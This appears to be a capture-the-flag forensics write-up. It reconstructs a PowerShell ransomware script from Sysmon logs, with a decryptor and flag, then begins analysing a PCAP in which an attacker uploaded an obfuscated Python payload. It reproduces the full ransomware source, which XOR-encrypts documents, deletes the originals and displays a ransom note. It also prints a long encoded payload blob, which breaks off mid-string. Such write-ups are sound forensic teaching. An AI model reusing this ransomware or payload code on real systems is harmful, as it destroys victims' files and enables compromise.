Question: Rumors of a black drake terrorizing the fields of Dunlorn have spread far and wide. The village has offered a hefty bounty for its defeat. Sir Alaric and Thorin answered the call also returning with treasures from its lair. Among the retrieved items they found a map. Unfortunately it cannot be used directly because a custom encryption algorithm was probably used. Luckily it was possible to retrieve the original code that managed the encryption process. Can you investigate about what happened and retrieve the map content?
Flag: HTB{Dunl0rn_dRAk3_LA1r_15_n0W_5AF3}
We are given an encrypted PDF file and event logs to investigate. However, it seems that all the event logs were purged by the attacker except Sysmon event log. Analyzing the Sysmon event log, a batch script was executed and ran multiple Powershell instances to execute different base64 strings.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
$k34Vm = "Ki50eHQgKi5kb2MgKi5kb2N4ICoucGRm"
$m78Vo = "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpZT1VSIEZJTEVTIEhBVkUgQkVFTiBFTkNSWVBURUQgQlkgQSBSQU5TT01XQVJFCiogV2hhdCBoYXBwZW5lZD8KTW9zdCBvZiB5b3VyIGZpbGVzIGFyZSBubyBsb25nZXIgYWNjZXNzaWJsZSBiZWNhdXNlIHRoZXkgaGF2ZSBiZWVuIGVuY3J5cHRlZC4gRG8gbm90IHdhc3RlIHlvdXIgdGltZSB0cnlpbmcgdG8gZmluZCBhIHdheSB0byBkZWNyeXB0IHRoZW07IGl0IGlzIGltcG9zc2libGUgd2l0aG91dCBvdXIgaGVscC4KKiBIb3cgdG8gcmVjb3ZlciBteSBmaWxlcz8KUmVjb3ZlcmluZyB5b3VyIGZpbGVzIGlzIDEwMCUgZ3VhcmFudGVlZCBpZiB5b3UgZm9sbG93IG91ciBpbnN0cnVjdGlvbnMuCiogSXMgdGhlcmUgYSBkZWFkbGluZT8KT2YgY291cnNlLCB0aGVyZSBpcy4gWW91IGhhdmUgdGVuIGRheXMgbGVmdC4gRG8gbm90IG1pc3MgdGhpcyBkZWFkbGluZS4KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQo="
$a53Va = "NXhzR09iakhRaVBBR2R6TGdCRWVJOHUwWVNKcTc2RWl5dWY4d0FSUzdxYnRQNG50UVk1MHlIOGR6S1plQ0FzWg=="
$b64Vb = "n2mmXaWy5pL4kpNWr7bcgEKxMeUx50MJ"
$e90Vg = @{}
$f12Vh = @{}
For ($x = 65; $x -le 90; $x++) {
$e90Vg[([char]$x)] = if($x -eq 90) { [char]65 } else { [char]($x + 1) }
}
function n90Vp {
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($m78Vo))
}
function l56Vn {
return (a12Vc $k34Vm).Split(" ")
}
For ($x = 97; $x -le 122; $x++) {
$e90Vg[([char]$x)] = if($x -eq 122) { [char]97 } else { [char]($x + 1) }
}
function a12Vc {
param([string]$a34Vd)
return [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($a34Vd))
}
$c56Ve = a12Vc $a53Va
$d78Vf = a12Vc $b64Vb
For ($x = 48; $x -le 57; $x++) {
$e90Vg[([char]$x)] = if($x -eq 57) { [char]48 } else { [char]($x + 1) }
}
$e90Vg.GetEnumerator() | ForEach-Object {
$f12Vh[$_.Value] = $_.Key
}
function l34Vn {
param([byte[]]$m56Vo, [byte[]]$n78Vp, [byte[]]$o90Vq)
$p12Vr = [byte[]]::new($m56Vo.Length)
for ($x = 0; $x -lt $m56Vo.Length; $x++) {
$q34Vs = $n78Vp[$x % $n78Vp.Length]
$r56Vt = $o90Vq[$x % $o90Vq.Length]
$p12Vr[$x] = $m56Vo[$x] -bxor $q34Vs -bxor $r56Vt
}
return $p12Vr
}
function s78Vu {
param([byte[]]$t90Vv, [string]$u12Vw, [string]$v34Vx)
if ($t90Vv -eq $null -or $t90Vv.Length -eq 0) {
return $null
}
$y90Va = [System.Text.Encoding]::UTF8.GetBytes($u12Vw)
$z12Vb = [System.Text.Encoding]::UTF8.GetBytes($v34Vx)
$a34Vc = l34Vn $t90Vv $y90Va $z12Vb
return [Convert]::ToBase64String($a34Vc)
}
function o12Vq {
param([switch]$p34Vr)
try {
if ($p34Vr) {
foreach ($q56Vs in l56Vn) {
$d34Vp = "dca01aq2/"
if (Test-Path $d34Vp) {
Get-ChildItem -Path $d34Vp -Recurse -ErrorAction Stop |
Where-Object { $_.Extension -match "^\.$q56Vs$" } |
ForEach-Object {
$r78Vt = $_.FullName
if (Test-Path $r78Vt) {
$s90Vu = [IO.File]::ReadAllBytes($r78Vt)
$t12Vv = s78Vu $s90Vu $c56Ve $d78Vf
[IO.File]::WriteAllText("$r78Vt.secured", $t12Vv)
Remove-Item $r78Vt -Force
}
}
}
}
}
}
catch {}
}
if ($env:USERNAME -eq "developer56546756" -and $env:COMPUTERNAME -eq "Workstation5678") {
o12Vq -p34Vr
n90Vp
}
Analyzing the Powershell script, it seems to be a straightforward encryption function. Hence, we can decrypt the PDF file by reversing this function (credits to @abdelrhman322 for his script).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
function Decode-Base64 {
param([string]$data)
return [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($data))
}
function Decrypt-XOR {
param([byte[]]$data, [byte[]]$key1, [byte[]]$key2)
$output = [byte[]]::new($data.Length)
for ($i = 0; $i -lt $data.Length; $i++) {
$output[$i] = $data[$i] -bxor $key1[$i % $key1.Length] -bxor $key2[$i % $key2.Length]
}
return $output
}
$key1 = Decode-Base64 "NXhzR09iakhRaVBBR2R6TGdCRWVJOHUwWVNKcTc2RWl5dWY4d0FSUzdxYnRQNG50UVk1MHlIOGR6S1plQ0FzWg=="
$key2 = Decode-Base64 "n2mmXaWy5pL4kpNWr7bcgEKxMeUx50MJ"
$encryptedData = [System.Convert]::FromBase64String((Get-Content "map.pdf.secured" -Raw))
$decryptedData = Decrypt-XOR $encryptedData ([System.Text.Encoding]::UTF8.GetBytes($key1)) ([System.Text.Encoding]::UTF8.GetBytes($key2))
[System.IO.File]::WriteAllBytes("decrypted_file.ext", $decryptedData)
Write-Host "Decryption complete. File saved as decrypted_file.ext"
ToolPie [Forensics]
Question: In the bustling town of Eastmarsh, Garrick Stoneforge’s workshop site once stood as a pinnacle of enchanted lock and toolmaking. But dark whispers now speak of a breach by a clandestine faction, hinting that Garrick’s prized designs may have been stolen. Scattered digital remnants cling to the compromised site, awaiting those who dare unravel them. Unmask these cunning adversaries threatening the peace of Eldoria. Investigate the incident, gather evidence, and expose Malakar as the mastermind behind this attack.
Flag: N/A
We are given a PCAP file to investigate and several questions to answer. Once all questions are answered, the challenge is considered solved.
Question 1: What is the IP address responsible for compromising the website?
Analyzing the HTTP traffic, an obfuscated Python script can be identified being uploaded from 194.59.6.66
in one of the website endpoints.
Question 2: What is the name of the endpoint exploited by the attacker?
Similarly, the website endpoint can be identified in the HTTP packet.
Question 3: What is the name of the obfuscation tool used by the attacker?
One easy way to cheese this question is to modify exec()
to print()
and execute the Python script directly. Once executed, the obfuscation tool can be identified and it seems to be a Python bytecode.
1
2
3
4
5
6
import base64
encoded_script = "aW1wb3J0IG1hcnNoYWwsbHptYSxnemlwLGJ6MixiaW5hc2NpaSx6bGliO3ByaW50KG1hcnNoYWwubG9hZHMoYnoyLmRlY29tcHJlc3MoYidCWmg5MUFZJlNZXHg4ZCp3XHgwMFx4MDBcblx4YmJceDdmXHhmZlx4ZmZceGZmXHhmZlx4ZmZceGZmXHhmZlx4ZmZceGZmXHhmZlx4ZmZceGZmXHhmZlx4ZmZceGZmXHhmZlx4ZmZceGZmXHhmZVx4ZWVceGVjXHhlNFx4ZWNceGVjXHhjMD9ceGQ5XHhmZlx4ZmVceGY0InxceGY5YFxyXHhmZlx4MWFceGIzXHgwM1x4ZDFceGEwXHgxZVx4YTlceDExXHgwN1x4YWNceDllXHhlZlx4MWVceGVlelx4ZjVceGRiXHhkOUpceGRlXHhjZVx4YTZLKFx4ZTdceGQzXHhlOVx4Y2RceGE5XHg5M1xyU0BNXHgxMzQmXHJceDExXHg5NHhGXHgxMVx4YTZceDg5XHhiMlx4OTlceGE2XHg5NFx4ZjBceDFhaVx4YTFceGE2XHg5YVx4MDNBRlx4ZDFceDFlXHg5ZVx4YTFceDlhXHhhN1x4ODlceGE2TFx4ODRceGY1XHgxYXlDXHhkNDR6XHg5OTNTIGhcclx4MGYpXHhlOVx4MDNAXHgwM0xHXHhhOVx4YTBceDFhXHgwNERJXHhlOFx4MTkkXHhmNFx4YzlceGU5MmFceGEzRFx4YzlceDlhTFx4MTFceDgxT1wnXHhhNFx4OWVceDkzNT1NXHhhNFx4ZDBceGQxXHhhNiZGXHg4MVx4OTNMXHg4Nlx4ODBceDAwXHgwMFx4MDZceDgwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBcck1cdDRceGQxXHg4MExcdFx4OTFceDE4XHhhOVx4ZTRceGM2XHg5NFx4ZDhceGE3XHhiNU9TXHhjOVx4YTQ9I1x4ZjU0XHhkNFx4MDZqXHgwN1x4YTlceGVhelx4OWFceDFlXHhhMVx4YTB6XHg4Nlx4ODNNXHgwM2poXHgwMFx4MDNBXHhhNkBceDFhXHgwMFx4MDBceDAzXHhkNFx4MDBceDFlXHhhN1x4OTQ0XHgwMDU9XHgxMFx4OTNceDEwXHg5YkBceDk5NFx4YzhceDk5XHhhM0pceDFiTVx4MWFqeU9GXHhhNlx4OThceGNhYlx4MGNceGQxNlx4YTBtJlx4OGZIXHhkM0A0NFx4MDFceGEwXHgwMFxyXHgwM0BceDAwNFx4MTlceDAwXHgwMFx4MDBceDAwNFx4MWFceDAxVTQ0XHgwMFx4MDNAXHhkMFx4MWFceDAwNDRceGQwXHgwNkBceDFhXHgwMFx4MDA0XHhkMFx4MThceDk4XHg4NkA0MmRceDAwaFx4MWFkXHgwMFx4MDBceDAwXHgwMDRoXHgwMFx4MDBceDAwYFx4OTEkQmhoNGBceDlhXHgxOVx4MDRceGMzQFx4YTlceGVkU1x4ZjRTXHhkMlx4MWJceGQ0XHhkYSZNJlx4ZDJtI1x4Y2FpXHhmYVx4OGNceDkzZT1AXHgxZVx4OTFceGEwelx4OGNqaFx4ZDFceGE2XHg4MFx4MDBceGQwXHgwMDRceDFlXHhhMFx4MDFceGEwXHgxYTRpXHhiNTRceGQzXHgxMFx4MWZceGRmXHhjYlx4OThceDk5XHJceGExXHJceDhjYFx4ZDg2XHgwY2RceGU5XHhjM1x4MDZceDlibTZceGRibVx4MWJceGYxIlx4ZjBceGQyXHhhN1x4ZDVwLFx4MTcxZ0FjR11WXHhjZnZyXHg5ZVxyXHg5ZD1ceDEzP05ceGZhXHg4YnczbGBceDBlXHgxY1x4ZGFceGRjXHhiMFZVXHhhMFx4ZTdceDhkZj4kXHgxMFx4YjVceGYyK2Z1XHhkNlx4ZDVceGVkXHg5YVx4OWN8Ylx4YjFceGM0XHhkMVBceGQwXHg5NVx4ZjhceDEwXHhjMFx4YjhceGQyXHgxMFxcIDlceDgzVUYjXkhceDEyXHgxMlx4OTFceDk4XHg5Y1x4MWRceDg5QlFceDhlQ1x4OTJceDA2Nlx4OGJEcFx4OGFceGFhXHgwM2UlXHhhZFx4YzRceGU1b1x4OGZceDAxXHhhMFx4MTFceDg0XHhhY1x4YjhIXHgwMV5ceGI3XHg4NHlceGVkXHgwY1VceGIzN1x4ZDdbd1x4ZGRtXHhmNFx4ZjlceGRiXHhlZTdceGE2XHg5OFx4ZTItQVx4ZWFceDFjXHhkNlx4YmVceGJmMVx4ZTJceDAzXHg4OUE6Mlx4YjBuXHgwYlx4YzE2OVx4OGFceGFiXG5cXFx4YTRceGEwXHhiYnsgXHgxMVx4YTdceDFlLVx4YmMsUGBGXHhhZFx4MDhceGUxXHg4ZFlceDliXHgwMixceDhjcyNlZyVceDk3XHgwNzFceGRhXHhlOFhBfD5ceGExXHhhZVx4YWFoJVx4YzRdXHg5NXcqNGlbXHg4NVx4ZWVceGVlPVx4Y2ZceDkzNXFceDAydW8iXHhhZlx4ODEvXHhjMFx4Y2FceGJkRjtceGY2XHhlZlx4YWFceDk5QS8gXHg5MVx4ZWZceDBiXHhlMVx4ZDlceGE0YHdceDllXHhjNlx4ODhceGYyXHhhOVNceGUzXHhhNnhceGFmfFx4MGIqSUVceDAyXHg4YShOTFx4MDBdP1x4MTJceDEwcD13XHhjNlx4OTJHXHg4YVx4ZDJceGZmXHgxN31+eTNceGUzXHhlOWZceGYxXHhmZlx4YWZceGYyXHhhNVx4YjlceGE1XHhjY1x4ZmQ7V1x4ZGRceDFlXHhjZFx4OWVceDBiRDVceDBiXHgwZlx4YzZ3RldcXFx4ZDVceDhkIEdoXHhjMVxufHgyXHg5OSZceDhlXFxceGE1QmFceDdmNiFceDEwXHhlNFx4ZDBwXHgxOFx4OTBceDk3azRceDFhXHhlY0BceDFifn5ceDhkXHhmZVx4ZWVceDk2XHgwN1x4OGZceGQ2XHhlMVNTXHhjZE92XHg4Y1x4ODlceGQySVx4MTUwXHhhNVx4ZGRceGFhPkVceDA3XHhkYlx4ZjhsXHg5N1ZceGEwXHgxY1x4OGRceGQ5XHhhNTBceDE3W2hceGQxXHgwMlx4MDghZlx4YWRceGVhXHhhMCJceDg4XHhjZUNceDBjXHgwZlZHXlx4YzBceGVhX1x4MTBceGJkXHhhMW17NUlMXHhiYlx4ZDJceDlhblx4MDdceGQ5YVx4OThqZ0l3ciYmXHgwNlx4MGNceDhhSFx4ZTczXHhkZFx4YjFceDA1MFx4OWZceDFmXHgxZlx4ZTFKXCdceDlkXHg4Y1lceGE4XHgxMVx4MGJceDA4XHgwZmQqXHhmMlx4OWRceGMyXHg4NCRceDEwXHg4YVx4ZDlceGMxXHhlMDVceGVjc1x4ZGVDXHg5YVx4ZDFceGI3XHg4NVx4MGVOaUpqMlx4OWFnXHgxMlx4OTRNKVx4ZDJcclx4ZjNceGE4XHg4NFx4YzlceGMyXHgwNlx4ZTFceDE0XHhkYVx4ZDFceDFlXHgxYlZceDFhXHgwYlx4ZTY2Nlx4YzZ+Vlx4ODEvclx4OThceDk1XHhmMmdceGM3TW08XHhlZFx4YjBceGU5a29ceDAxXHhjYjRceDg4XHgxN1x4ODRceDhhIkpceDliSlx4MThceDBjaDtceDg0XHR2XHhjYlx4YmFFTFx4OTlceGRmXHhhYSlxL3Q6NDVceGJhXHhiZlx4ODRWXHhmNVx4YjNceGFkXHg4Y1x4ZWVceDExXHhlMihceDE4Plx4ZWEzXHhhOVx4OThceGE4Qlx4Y2ZceGI1XHhkY1x4ZWRceGFjSTxceDkwXHgwNlx4MWQwKVlAXHg4Nlx4MDdceDdmXHhlZVx4YjlceGY1e21ceGRmXHg4M0hmXHhiM1RceGQyXHhkZlx4OWNceGM2XHhhYlx4YWNceDEzXHg5OVx4Y2JceGVjXHhmNUtceGYyXHg4MFx4Y2VceDlmQ1x4ZjR3XHhlYlx4MWZhXHgwOFx4ZDhcclx4ODA8JVx4OTB3XHg4Ylx4ZTh9XHg4ZFx4ZGFceDk2XHhjZilceDFhXHhiYUQuXHhhM1x4YzJceGU1RVx4ZTNceGM5cFx4YTgmd1x4MTBceDE0XHhjNiR2LUlceGQ5XHhiZFx4Y2ZceGJmXHhlMVx4Y2VceDE5XHhjZGZceDA3XHgwYlx4N2ZceGQ3XHhjODpceGE2bndceGZjPU1cXG5ceGM3XHgwMlx4OTZcblx4ODUiLmpceGE4R31ceDA0XHhlZlx4MWUrXHhiMCk0XHg4MkdfXHgwNVx4ZmVceGJlXHg5NFx4ZjNceDAzXHhkNCpceGUyXHhmN1RceGE4XHg5N1x4OTdceGMzWFx4OGFceDlhO1x4OWFceGJlaVx4YzlceGFkXHhkMVx4ZDJceGNmXHhkZTRmcHpceGNlXHJZXHhhNVx4YTJzXHhhZFx4ZjgoU1x4ZjMqXHg4NVx4ZWEkXHgxNFx4MThceGI2XHgxYVx4YmJceGM1Lk9ceGMzXHhiN1x4ODlceGViOVx4MWE0XHhkM1x4ZTBceDk5OXJceDk5XHg5YShceDg0XHhjZVx4MTdceDBia1x4YTU5XHhkMlhceDg4XHg4MTVceGFiXHgxMHhceDlmXHhiN1x4YzVceGU3X1JceGFhXHhhYVx4YWJceGYyXHg5ZVx4ZTFceGI5XHg4YUtceDkxXHhhM1x4YTFceGE3XHhjMFx4OTRceDhmM1x4Y2FceDgyXHg4YXpZXHhjNGdceGVkXHhjZlx4YTlCTzpgXHhiNVx4MWIyXHgxMlx4YmJceDg5XHgxN1ttXHhhMlx4ZThceGM0XHgwY3RKLy1ceGE1XHhiZlx4ZjFceGZmcVx4N2ZceGRhXHg5YVx4ZDlceDAwXHhiMlx4MGJceDk4TFx4N2ZceDE3XHhiNFx4YzlnfVx4MWVceGZlU2ggXHhjM1x4OThmSXFceDA1XVx4YjFceDhhQlx4OThceGM3XHg5NFx4MDM9MiZceDA2dkBzXHgwZlhceGIzXHhhZFpceGNmXHhhY1x4ZjZceGFlXHhlMlx4MGJceGFhXHhlNFx4OTlceGYzXHhmNTxceGQ3XHg4MW11XHg4N1x4YjVceDk3XHhkMlx4YzNceGI0cFx4YjVceGFkXHhkOXlceDE1XHhmMlx4MDYsXHhhNztceGUyXHhlNFx4Y2FIXHhiZlx4ZDVceDkyQFx4YWVceDBjXHg5MVx4ZGREXHg5YnlceGQ1XHhjY2pceDdmXHhhOVx4MTlceGFkXHhhM1x4MDdceGJkSVx4ODRceGE5fGsvXHgwZjc9amlceDEyXHhiYVx4ZDRceGZhSVx4OGNceGE5XHg5NFxuXHg5Ylx4YTQzXHgwZVx4YTZPXHhkM1x4OGRceGY1XHg4M1x4MDZceGQ4XHhhZWhobFx4MDUqO1x4ZGFceGFhXHhkOWhlXHhjOFx4OGYyIVx4OThceGQ2LUJceGE5XHhjZlx4OWFceGI5X1x4YTRceGVjXHhkYVx4MDg8XHhlM1xyXHhlZW1ceDFlbFx4ZDhceGZjfTNceGM0XHhiYWxceGU1LFBceGU0Xlx4YWUtXHg5N1x4OTFqMFx4ZWNceGM4YkJceDg1XHhkMS5ceGY1VFx4YTRceGYxXHg4M1x4ODlceGM0LVxcXHgwMFx4ZjBceGJiXHgxYVx4ZDJceDg5S1x4YjU4XHg5Nlx4ZTJceDg4XHhkZDxxXHJceGJiMFx4YzRBY1x4OTUudlx4OTRceDA4Plx4Y2FceDhiXHhmNVx4YTFceGFmXHgxZlZIXHgxNlxuXHhmZStceDAyXHg5Zlx4ZTlceGE3VlBceDFhXHgwM21ceDAxXHhhYlx4MGJceGY4XHhkMSZceGFjcVx4YWRnXHgwZlx4ZmNceDk4Tlx4OTFYUlFceDg4XHhjZi0gNEtceDg0cSJceGVjXHhiMlx4OGNceGU2ZVx4ODYgXHg5ZmZceDEwXHg4M3BceGM1XHhjMUNceGY0XHg4YzVceGRhXHhlNVx4ODIpXHhjZlxuXHhiZldaXHhjMFx4ZDFceDliYFx4YWNGdFx4YmFceGVkXHhhZiNceGM4XHhmOFx4OTZceGU5PVpkXHhhNGhceGEzZD5ceGIyXHhlY1x4YWNceDk4XHhlNiVceGNhXHhiMnJceGUyXHhkN1x4YjVceDgwXHg4Y1x4MWNiMFx4YWRDXHg4YVx4ZGJceDFlXHgxZFx4OWVrXHhmMD5ceGNmXCc3PVx4OWJceDE5XHhkZWVAXG5ceGFhXHhhY1x4ZDJOJSRceDkxXVx4YTdceDEzY1x4ZTdceGNlXHg5NVx4OTZceDgxWWhcblNceGQxXHhkY1x4YjVceGUzZHtceDEzXHhjNVx4ZWF1MjJceGNjXHhlY1x4ZTFceDE5XHhiNlxuXHg4ZT9cblx4MDFceGRleVx4MDR0XHgwMiJAXHg4Mlx4MTJKXHg4OFx4ODZceDFiXHg4M1VuXHgwM1V5XHhlZFx4ODJceGMzXHgxOVx4ZGRceDg2XHJceGRhXHgxYVx4ZGVceDdmXHgxNFx4OTBceGIzXHhhZj9ceDA1XHhkM1x4ZjBceDA1XHhlOVx4ODVceDgzXHg5OW1ceDhhZVx4ODZceGQ1OVpsXHg4M2lceDA0dTxceDkyXVx4ZTlceGNhXHhiY1x4ZjVrXHhjZFx4OGUsXHhjMVx4ZmNVXHhjN1x4ODQlfD5ceGZidFx4OWNceDA0XHhmMH1ceGNlUXxXeVx4OWVOXHhhOFx4MTkjXHgxMlx4OTRceGYxXHhmZFg1YFx4MTlceDBlXHg4N053Q1x4YTVceDgwcFx4YjFceGQ5XHhjNzNGXHhlOFx4YTVceDljXHgwMFx4ZTVceGIxKVx4ZDNdXHhhNlxyXHg5ZFx4MWFceGRkXHhhNFx4OTFceGI5en1ceDFiZ1x4MTJceDllPFxuQlx4ODhceDBlXHhkZjpceDFjXHRceGMzXHhhM1x4ODVceDFiXHg5OHlceGVjXHgwY1x4OWFceDEyUHJceGNkQ1x4ZWExXHg3Zlx4MDFceGVmXHhjM1x4YjBceGRkMTZceGU3XHgxZVx4ZjdceDFmdjRceDE3XHJceGQzXHg4Nlx4Y2VFQFx4Y2VceDE1VFx4Y2VceDAwXHhmM0BceGQ5XHJceDA1XHgxOUBWXHgxYyJceDg2XHhhNlx4OWMmLFx4MDVceGE2JVx4MDJuKF45XHg4Nlx4YTY1I1x4YzhceGI1XVx4ODhceDhlXHhhMiwxXHhjM3UyXHhlMFx4YTggXHgwMVx4ZmYifFx4ZmZHXHgwYjZceGJlVVx4OGFceGY3O1lEXHhkYVx4YjR1KWxceGY2flwnXHgwZVx4OWJceGIzL1x4OThRMVx4MDRceDEySklbXHgxMSpceDgxXHRceDA3XHhjYlx4YWR3XHhjOVx4YmZceGJmXHhiZVx4YmFhXHhjNlx4Y2VceDllKVx4OTh2XHgxNVx4MDFqXHhhMTVceGJkXHhkMFx4Y2IuXHhlM1x4ZDdceGEyYFx4MTVceDllXHg4NTRceGQzXHgxYW1cclx4MTNBXHg5YVx4YTVceDBiXHJceDgxXHJceGI5XHhiMyUpQm1yXHgxMkxccj5ceDg3XHgwN0tceGVhXHhkZW5ceDg3XHgwMWM2JVx4ZWFceGE1XHhkOFx4YjU0XHhjMFx4Y2FceGI4U0Jke09ceDljIFx4ODhceDg2XHhlZS04MFx4ODFWdlx4MDhbUFx4YzIyMVx4OWUgJix0XHgxMS85XHhlMFx4ZDBceDFmXHgxZFx4Y2RceDk0XHhiOVx4OTVceGM3Vlx4Y2JceGQ2XHhmMk1ceGY3XHhmNGdUXHhhMlx4MTlceDk0XHhkOVx4ZmJceDdmXHgxNVx4OTBceGM1XHhiMiZceDllfVx4MGNxXHhlOFx4ZGMoXHgxYXtsXFxceDg4XHhiOFx4YWI9XHg4Ylx4YWFDbVx4YzBceGNiXHhiNXc9XHhmOFx4ZmZceGEzXHhkZllceDk0XHhhNVx4YTVceDlkMFx4MDRVXHg4YWxceGI4aXdceGEzXHhiMCVceGYxIFx4MDNIXHg4MFx4Yzkkdlx4ZTZceDk4fCNEWVBceGE0XHhmZVwnXHgwNFx4ZTAmXHg4OCtceGViXHhjZTpceGEwY20sXHgxYVFceGZkTlx4MWNceDk3XHhhM1x4OThceGI1cVx4MWNceGVmRVx4YWJFQ1x4YWFceDgyXHgwMFx4OGNceGNiXHhlZVx4OGRceGQ2bFx4ZTVcXFx4Y2E7XHhmOWRceGQ0XHhhNVx4YWVuXHhmYVc9XHg4OGtVOVx4ZmVceDk1JmNceDEzXHgwY0w3KzVceGUyXHhkZV9ceDlmXHhmNnRceDA1SG5ceGUyXHhmZlx4OWR6aVx4OWFceDAzQGB1XHhlYVx4OThceGI1XHg4ZVx4ZDlceGEzV1x4ODVceDk2T1x4ODVceDliZlx4YzFceGI2XHhhNHhceGEyLz1ceDBmXHhhNlRceGRlXHhhY1x4YzZceDg0XFxceGE1cSBceDhlWlx4ZDVwKi1xQyVceGVjXHg4NWFIXHg5MD5ceGMxXHg5NyVCQFx4MTJCInVceGQ1Ulx4MGZceDEwYCZceDlhaVx4MWNsKkZceGVmT3JceGFlZVx4YWZceGE5XHg4OHFceGEyazkzXHhlNlx4ZjZceGY1XHhhOG5ceGQwXHhmNDJceGU1PFx4Zjd9XHhhZFx4ZGNceGQ0KUxceDExXHg5N1x4ZDRceDkyXHgxMUVceGUxXHhhMFx4YTRceGU0e1x4OWFceGU2VFx4ZGEgXHhlZVx4ODNceGI3XHhjZVx4MTdceGIwXHhiM1x4MGNceDExXHg4Zlx4YzF0XHgwY1x4YjVceDg3XHg5ZVx4YmJceDBmXHgwZnFsXHhlOFRceGM1XHgwMitFXHhkZFx4YmNRXHg5Mlx4YjhceGI4XHhjOCosKEtcdFVrXHgxNlx0XHg4Nlx4YjlAXCdceDA0XHhjMWwmXHhjZilceDFmXHgxNFZceDBiXHg4MFx4ZDJcclx4YWJceGVjXHgwNykgXHgwY1x4MGZceDgwXHhlZVx4MTZceDE0XHhmOVx4OWNceGNiS0VceGVkYDs1XHhhOVx4YzJceDEwNVhbXHg4N1x4ZDZqXHg5NVx4MThceGNhWVx4OTlceGJhXHhlNlx4ZThceDA0cVx4ODM0NFx4Y2VXXHgwMFx4MDVceGM0XHgxNVx4ZmJceDgyXHhlYTlceGZjSlx4YTNMXHg4ZVxuXHhjMVx4YjRceGIzc1lceDg0YFx4OThceDk5XHhjY3lceDBme1x4MDJQXHg4ZVxuXHhiM1x4ZTVceGVjbE5ceGE4XHhiNV1ceDg0IUlceDgwXHhhNFx4OGF0Jlx4ZTRldVx4YmFceDE1VFx4MWZ2XHg5MGZ4XHg4MVA5XHgxYVx4ZjVHXHhhOVx4YTJceDljXHhlZFx4YzRXXHhhMFx4YmJceGE1alx4MWVceDFiXHhkOSVKXHhiM3oxSWBceDE5c1x4ZDlceGIwXFxceGNhXHhmZGRceGQ1NCFceDgyOVx4YzJ8XHgwY1x4ZWRceGRiXHgwZVx4ZGU6XHhjYiVsLVx4ZjZceDhmXHhlZlx4ZGVceGUyXHhhNWhceGI2ZVx4YzVceGM3IVx4YzYgQEJceDk3Llx4YzIsflx4ZjhceDhhXHgxNFx4OTRceGViXHg4ZW1SXHhmOFx4ZmJceGE1IlFkXHhjMFx4ZTZceDgxXHhiZVx4OWZjPXNceGQ2LFZceGNhXHhiMVx4ODAhVVx4OGNceDgyIlx4ZGRtZVx4YmM9XHhmOVx4MWJceGZjXHg4ZFx4ZTYrXHhjM1x4Yzg6eVx4ZTJceGZjWlx4MWNceDg4XHg5ZntceGRiWktceGIwIyxceGI4XHg5Zlx4MTBceGUxXHgwM1x4YjBIXHg3Zlx4ODl3XHhlZVx4ZDdceDlkdnhceGFmb1x4OTh2Z2UlXHhkYyJceGQxXHgwZlx4OWRRP1x4ODNOXHhlM1x4YjRceDE0aiV8Q1x4MDhceGIwXHgxNktceGMxSFx4OWRceGY4XHhiY1x4ZjRceGFlXHhhN1x4OGFBXHhkMFx4YmZDTVx4ODV3XHg4MiljXHhjY1x4ZDRceGNhVlx4YzUyalx4MTRPYkImXHhlN05RXHg5ZVwnOTNNXHg4ZmAhXHhjY1x4ODAjJVx4MDRceGQyXHhlYiJUXHhiZVx4OGQwXHgwNFx4YTVceGFkXHhhM1x4YWJceGY2XHhkNVx4ODZceGUyMTRceGIxXHhhNlx4MTJceGE2KnRceDk0UVx4MGMhXHhjMVx4ZTAjXHgxOFx4OGFceDgxXHhlNFx4MTJBXHhjY0tceGM2XHhhM1x4YTlceGQwa2hceGJiXHgxMW1ceGQ3XFxceGU2XHhlOHdyXHg5OTBceGMwXHg4M1x4ODVcckNceDlkXHhjOFx4YzdceGZjdlx4ZjhZL1x4OTNceGMzME5GZVx4YzJceGY3c1x4OTFceGI3Qlx4YTZceDEwYmJceDExXHgxOFx4YjBceDE5XHhmNFx4YTFYXHhiOVx4OTJceGIzXHhkYytceDk2Mlx4OWNceDBidFx4ZDlsLCZceGU4XHgxZlx4MGJceGZlXHhmNFx4YjdceGNkXHgwZVx4MTFceGM5I1pceGIwXHg5MGQyXVx4MDZceDg5XHhjZFx0XFxceGEzXHRceGFkXHg4ZFx4OWJceGU1Wlx4ZDBceGE2XHhhNzNxez5fXHhkN1x4ZGRceGUyMVx4ODNceGEya1x4MDRET1x4YzBBZztaXHg5OTtceGRmXHgxNFx4OWU8XHhlM3ZceDFkXHg5OVx4OGJceDlhXHg5OGRceGU2XHgwNVx4Y2QpXHg5NFx4YzJceDliOkYgXHhjZEdceGRlUFx4ODY5XHhkZClrZ1x4ZDJceGRlKlx4MWFceDljXHgwNFx4MTBceDEyelx4ZGE0XHg4ZCxceGNiXHhlY1x4Y2JSXHg5OVx4MGZceDljXHg4MVx4MDhceGVhcnpceGU1Ulx4MTdcJ1kuPVx4OWVsXHhlOVx4YzRceGVldzBceDA4XHgwNlx4YzBnL21ceGUwXHhmMDRceDFjXHgwY1x4ZmNOXHhjMFFceGFhXHhiZlx4YzVceGU4XHhhMHk1XHg4OFx4ODNceGRldFx4YTNceGNlIWUiXFxceDEzRlx4ZWVvXHhmN11ceGNkXHhhMHRceDAxRltoXHhhZFx4YTBhXHhkN1x4MDJceGRhNVx4Y2RvXHhhOT5ceGYwXHg4OFBceDlkTVx4YjNBXHhjOFx4OTJceGQ2XHg4Ylx4MWIuXHg4Ylx4OGZceDliXHg4Y1x4ZGFceDljUVx4